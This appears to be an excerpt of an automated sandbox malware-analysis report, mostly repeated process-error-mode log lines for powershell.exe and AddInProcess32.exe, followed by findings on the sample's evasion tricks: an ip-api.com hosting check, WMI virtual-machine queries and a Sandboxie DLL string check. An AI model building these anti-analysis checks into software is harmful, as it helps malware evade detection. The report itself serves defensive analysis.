Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLT-
Source: powershell.exe, 0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2C50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
